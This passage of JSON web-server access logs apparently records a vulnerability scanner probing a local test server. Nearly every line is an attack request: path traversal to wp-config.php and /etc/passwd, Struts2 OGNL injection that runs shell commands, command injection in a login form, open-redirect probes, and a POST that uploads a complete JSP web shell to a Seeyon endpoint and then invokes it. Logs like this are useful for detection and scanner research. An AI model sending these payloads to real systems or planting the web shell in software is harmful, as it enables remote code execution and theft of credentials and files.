WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmodule-ee/login.seam HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sqlitedb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https%3a%2f%2fexample.com%2f HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /authenticationendpoint/29kangnndahbcma0flrq7whcsok.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /__swagger__/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_vti_bin/Authentication.asmx?op=Mode HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:%0a%0dexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_swagger_/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"29KAniG4jhlWapbzVPytgCO19OT","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /testing-put.txt HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cacti/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%0a%0dexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/swagger-ui/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /testing-put.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%09/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/swagger-ui/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pdb/meta/v1/version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%2f%2f.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger-resources/restservices/v2/api-docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /LICENSE.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%3F.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger_doc.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?noptin_ns=email_click&to=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%5c%5c.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dompdf.php?input_file=dompdf.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"DBSTEP V3. 0 343 0 658 DBSTEP=OKMLlKlV\x0D\x0AOPTION=S3WYOSWLBSGr\x0D\x0AcurrentUserId=zUCTwigsziCAPLesw4gsw4oEwV66\x0D\x0A= WUghPB3szB3Xwg66 the CREATEDATE\x0D\x0ArecordID = qLSGw4SXzLeGw4V3wUw3zUoXwid6\x0D\x0AoriginalFileId = wV66\x0D\x0AoriginalCreateDate = wUghPB3szB3Xwg66\x0D\x0AFILENAME = qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdb4o5nHzs\x0D\x0AneedReadFile = yRWZdAS6\x0D\x0AoriginalCreateDate IZ = 66 = = wLSGP4oEzLKAz4\x0D\x0A<%@ page language=\x22java\x22 import=\x22java.util.*,java.io.*\x22 pageEncoding=\x22UTF-8\x22%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+\x22\x5Cn\x22);}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if(\x22x\x22.equals(request.getParameter(\x22pwd\x22))&&!\x22\x22.equals(request.getParameter(\x2229KAnf9f38QPTi1B0JsSvTPsYWZ\x22))){out.println(\x22
\x22 +excuteCmd(request.getParameter(\x2229KAnf9f38QPTi1B0JsSvTPsYWZ\x22)) + \x22
\x22);}else{out.println(\x22:-)\x22);}%>6e4f045d4b8506bf492ada7e3390d7ce","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /seeyon/htmlofficeservlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%5cexample.com@ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /seeyon/test123456.jsp?pwd=asasd3344&29KAnf9f38QPTi1B0JsSvTPsYWZ=ipconfig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%23.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lib/dompdf/dompdf.php?input_file=dompdf.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"user=pdnuclei%20%26%20echo%20%cG9jLXRlc3Rpbmc%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd=pdnuclei","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /actions/authenticate.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /includes/dompdf/dompdf.php?input_file=dompdf.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 